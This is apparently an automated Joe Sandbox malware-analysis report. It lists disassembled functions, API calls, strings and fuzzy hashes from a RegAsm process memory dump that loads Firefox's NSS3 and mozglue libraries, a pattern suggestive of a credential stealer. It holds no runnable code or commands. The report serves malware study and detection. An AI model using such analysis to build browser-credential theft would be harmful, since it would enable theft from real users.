Part of subcall function 6CADC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CADC2BF

PR_EnterMonitor.NSS3(?), ref: 6CAC2D02
PR_EnterMonitor.NSS3(?), ref: 6CAC2D1F
PR_ExitMonitor.NSS3(?), ref: 6CAC2D42
PR_ExitMonitor.NSS3(?), ref: 6CAC2D5B

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: 5744b763ea6e7f923e6e3a252174605154f5a6d5ea2951db8400d83b2de3dc5a
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: 7601C8B5B002005BEB319E3AFD40BC7B7A1EF55318F045A25E85A86710E632F9598B93

Function 6CAC2D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CAC5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CAC5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAC2D9C

Part of subcall function 6CADC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CADC2BF

PR_EnterMonitor.NSS3(?), ref: 6CAC2DB2
PR_EnterMonitor.NSS3(?), ref: 6CAC2DCF
PR_ExitMonitor.NSS3(?), ref: 6CAC2DF2
PR_ExitMonitor.NSS3(?), ref: 6CAC2E0B

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: 440d472e2f4b1e6e5476ebb3b769a407bb607e31ff27f618a4389d6c70b0419d
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: F601C8B5B002005BE7309E3AFD01BC7B7B1EF55318F041535E85A96B11D632F9598693

Function 6CA5AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6CA43090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CA5AE42), ref: 6CA430AA
Part of subcall function 6CA43090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CA430C7
Part of subcall function 6CA43090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CA430E5
Part of subcall function 6CA43090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CA43116
Part of subcall function 6CA43090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA4312B
Part of subcall function 6CA43090: PK11_DestroyObject.NSS3(?,?), ref: 6CA43154
Part of subcall function 6CA43090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA4317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6CA399FF,?,?,?,?,?,?,?,?,?,6CA32D6B,?), ref: 6CA5AE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6CA399FF,?,?,?,?,?,?,?,?,?,6CA32D6B,?), ref: 6CA5AE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CA32D6B,?,?,00000000), ref: 6CA5AE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6CA32D6B,?,?,00000000), ref: 6CA5AE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6CA32D6B,?,?), ref: 6CA5AEA3

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: d670faf01cf3273ce2dbe6391fdb6ec3b68e248b2b4338cd04a5ea8b1b3141ac
Instruction ID: 6f19580b490b4be1a81073a5cfe9aaf566759ce3b98f2118320b71527b976b01
Opcode Fuzzy Hash: d670faf01cf3273ce2dbe6391fdb6ec3b68e248b2b4338cd04a5ea8b1b3141ac
Instruction Fuzzy Hash: 5701F4B2B0007057E701916CAD85ABB316A8B8765CF888031ED0AD7B01F635DDE943B3

Function 6CB4BDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6CB47AFE,?,?,?,?,?,?,?,?,6CB4798A), ref: 6CB4BDC3
free.MOZGLUE(?,?,6CB47AFE,?,?,?,?,?,?,?,?,6CB4798A), ref: 6CB4BDCA
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CB47AFE,?,?,?,?,?,?,?,?,6CB4798A), ref: 6CB4BDE9
free.MOZGLUE(?,00000000,00000000,?,6CB47AFE,?,?,?,?,?,?,?,?,6CB4798A), ref: 6CB4BE21
free.MOZGLUE(00000000,00000000,?,6CB47AFE,?,?,?,?,?,?,?,?,6CB4798A), ref: 6CB4BE32

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: free$CriticalDeleteDestroyMonitorSection
String ID:
API String ID: 3662805584-0
Opcode ID: 64724213ccaaa8e133e551cabc438bd0247d721e8ac12331a1e9f6b98255dd31
Instruction ID: 91e0307a2eb6479eb052a7e0c1bfddc261ea58a9e6530e196b0d5f1f396cd9a5
Opcode Fuzzy Hash: 64724213ccaaa8e133e551cabc438bd0247d721e8ac12331a1e9f6b98255dd31
Instruction Fuzzy Hash: EA1133B9F066509FEF00DF29DA4EB063BBDEB4B344B450069E60A87701E331A418CB93

Function 6CB47C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON

Download Yara Rule

APIs

PR_Free.NSS3(?), ref: 6CB47C73
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB47C83
malloc.MOZGLUE(00000001), ref: 6CB47C8D
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CB47C9F
PR_GetCurrentThread.NSS3 ref: 6CB47CAD

Part of subcall function 6CAF9BF0: TlsGetValue.KERNEL32(?,?,?,6CB40A75), ref: 6CAF9C07

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CurrentFreeThreadValuemallocstrcpystrlen
String ID:
API String ID: 105370314-0
Opcode ID: 9a21ef5b6880902a9695a23b59f2a7ab089884f643787d8d5a278bcc1bedbef2
Instruction ID: 07b5a923219b40b2cafa0a44b6414ffbdaa08506f9c842a8f1892546c3481d24
Opcode Fuzzy Hash: 9a21ef5b6880902a9695a23b59f2a7ab089884f643787d8d5a278bcc1bedbef2
Instruction Fuzzy Hash: ACF0C2F19142466BEB009F7A9D0994B7B58EF01265B11C535E819D3B01E734E118CAE6

Function 6CB4ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6CB4A6D8), ref: 6CB4AE0D
free.MOZGLUE(?), ref: 6CB4AE14
DeleteCriticalSection.KERNEL32(6CB4A6D8), ref: 6CB4AE36
free.MOZGLUE(?), ref: 6CB4AE3D
free.MOZGLUE(00000000,00000000,?,?,6CB4A6D8), ref: 6CB4AE47

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 00277140992592faeebde1c2e112246a60b94b8c68188af37a622090b8b2e3a0
Instruction ID: 22008180da522b32862bfb857bedf7cd488fdd884adfe53a725f20fd01a1a906
Opcode Fuzzy Hash: 00277140992592faeebde1c2e112246a60b94b8c68188af37a622090b8b2e3a0
Instruction Fuzzy Hash: E5F0F6B6202A05A7CA009FA8E848D57777CFF8BB747204328E13A83944D735E015DBD6

Function 00426719 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00426725

Part of subcall function 00424954: __getptd_noexit.LIBCMT ref: 00424957
Part of subcall function 00424954: __amsg_exit.LIBCMT ref: 00424964

__getptd.LIBCMT ref: 0042673C
__amsg_exit.LIBCMT ref: 0042674A
__lock.LIBCMT ref: 0042675A
__updatetlocinfoEx_nolock.LIBCMT ref: 0042676E

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: e5b528c2df55b90b8f95683bbe5c3f4538672bfb3054380b72a1938f3589f922
Instruction ID: 61088e3dfc20ce59d559a3ddfa1e0e88c0a27e6c6fc14d0a94ffceeb635e971d
Opcode Fuzzy Hash: e5b528c2df55b90b8f95683bbe5c3f4538672bfb3054380b72a1938f3589f922
Instruction Fuzzy Hash: A0F09672F047309BDB11FB79740675E76A0AF4076CFA2014FF454A62D2CB2C5940D65D

Function 6C9D7C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9D7D35

Strings

database corruption, xrefs: 6C9D7D29
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9D7D13, 6C9D7D1F, 6C9D7D47, 6C9D7D53, 6C9D7D5F
%s at line %d of [%.10s], xrefs: 6C9D7D2E

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 0f8525f6b7239861891202d16b2a2e359c71c1a81df31e7d5d46ddae8c81502e
Instruction ID: f532c0a43c165f28b48e83d3403795c72e68ffff8e94ba0f5e6ae72ee507273a
Opcode Fuzzy Hash: 0f8525f6b7239861891202d16b2a2e359c71c1a81df31e7d5d46ddae8c81502e
Instruction Fuzzy Hash: CE314871E046699BC710CF9EC8809BDB7F5EF48319B5A8196F848B7B89D270E841C7B0

Function 00410077 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0041009A

Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC0D
Part of subcall function 0042EBF8: __CxxThrowException@8.LIBCMT ref: 0042EC22
Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC33

__EH_prolog3_catch.LIBCMT ref: 00410139
std::_Xinvalid_argument.LIBCPMT ref: 0041014D

Strings

vector<T> too long, xrefs: 00410095, 00410148

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
String ID: vector<T> too long
API String ID: 2448322171-3788999226
Opcode ID: cc5a60ddabb20db1201aed0d317c3cbb809968f8e12f32ad08655375e537c1c5
Instruction ID: ab79b4cfd7630e9d33afc21f0db27ea74fca8642dd6ebc8e538bd538cb18ba69
Opcode Fuzzy Hash: cc5a60ddabb20db1201aed0d317c3cbb809968f8e12f32ad08655375e537c1c5
Instruction Fuzzy Hash: 7931E532B503269BDB08EF6DAC45AED77E2A705311F51107FE520E7290D6BE9EC08B48

Function 6C9C6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C9C6D36

Strings

database corruption, xrefs: 6C9C6D2A
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9C6D20
%s at line %d of [%.10s], xrefs: 6C9C6D2F

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 886d4d8a007e260f0043bc1077baca2ae2ff3cda1c26b9053c0cbe7612eb9fce
Instruction ID: 7e01167b6c54a127920d43347e80d220cef613055c27f21be356d882ec9aa068
Opcode Fuzzy Hash: 886d4d8a007e260f0043bc1077baca2ae2ff3cda1c26b9053c0cbe7612eb9fce
Instruction Fuzzy Hash: 6B21E2717043059BC710CE1AC841B6AB7F5AF94318F144528D8499BF51E771F985C7A3

Function 00413390 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004133AF
StrCmpCA.SHLWAPI(00000000,004367E0,?), ref: 004133E8

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

strtok_s.MSVCRT ref: 00413424

Strings

"xA, xrefs: 004133A1, 004133A4

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID: "xA
API String ID: 348468850-582338916
Opcode ID: bf84bfb386d6fc06eea78c161eafd360b80df2d8d05c54f88f0f7eaf07e2e23e
Instruction ID: 530b5b9384520956d988ef5f9eef14088f7e00acaaf5feba0a58aa85cdec459f
Opcode Fuzzy Hash: bf84bfb386d6fc06eea78c161eafd360b80df2d8d05c54f88f0f7eaf07e2e23e
Instruction Fuzzy Hash: 74118171900115AFDB01DF54C945BDAB7BCBF1430AF119067E805EB192EB78EF988B98

Function 6CAFCC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6CAFCD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CAFCC7B), ref: 6CAFCD7A
Part of subcall function 6CAFCD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CAFCD8E
Part of subcall function 6CAFCD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CAFCDA5
Part of subcall function 6CAFCD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CAFCDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CAFCCB5
memcpy.VCRUNTIME140(6CB914F4,6CB902AC,00000090), ref: 6CAFCCD3
memcpy.VCRUNTIME140(6CB91588,6CB902AC,00000090), ref: 6CAFCD2B

Part of subcall function 6CA19AC0: socket.WSOCK32(?,00000017,6CA199BE), ref: 6CA19AE6
Part of subcall function 6CA19AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CA199BE), ref: 6CA19AFC

Part of subcall function 6CA20590: closesocket.WSOCK32(6CA19A8F,?,?,6CA19A8F,00000000), ref: 6CA20597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6CAFCCB0

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: 3eb42b2f5567623e389a3e699caecc284bc9706e1cd35b3e55006e14f2635c0f
Instruction ID: 4ea2cb0f89339334c47e004634cbc9bd89a6fa911b0223be8b57b771ce4694cf
Opcode Fuzzy Hash: 3eb42b2f5567623e389a3e699caecc284bc9706e1cd35b3e55006e14f2635c0f
Instruction Fuzzy Hash: B911B1B5B082D09EDB00DF6A9A06B563AAC9347318F1E5039E416CBB45E730CC48BBD2

Function 6CA61CC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Initialize), ref: 6CA61CD8
PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6CA61CF1

Part of subcall function 6CB409D0: PR_Now.NSS3 ref: 6CB40A22
Part of subcall function 6CB409D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CB40A35
Part of subcall function 6CB409D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CB40A66
Part of subcall function 6CB409D0: PR_GetCurrentThread.NSS3 ref: 6CB40A70
Part of subcall function 6CB409D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CB40A9D
Part of subcall function 6CB409D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CB40AC8
Part of subcall function 6CB409D0: PR_vsmprintf.NSS3(?,?), ref: 6CB40AE8
Part of subcall function 6CB409D0: EnterCriticalSection.KERNEL32(?), ref: 6CB40B19
Part of subcall function 6CB409D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB40B48
Part of subcall function 6CB409D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB40C76
Part of subcall function 6CB409D0: PR_LogFlush.NSS3 ref: 6CB40C7E

Strings

pInitArgs = 0x%p, xrefs: 6CA61CEC
C_Initialize, xrefs: 6CA61CD3

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
String ID: pInitArgs = 0x%p$C_Initialize
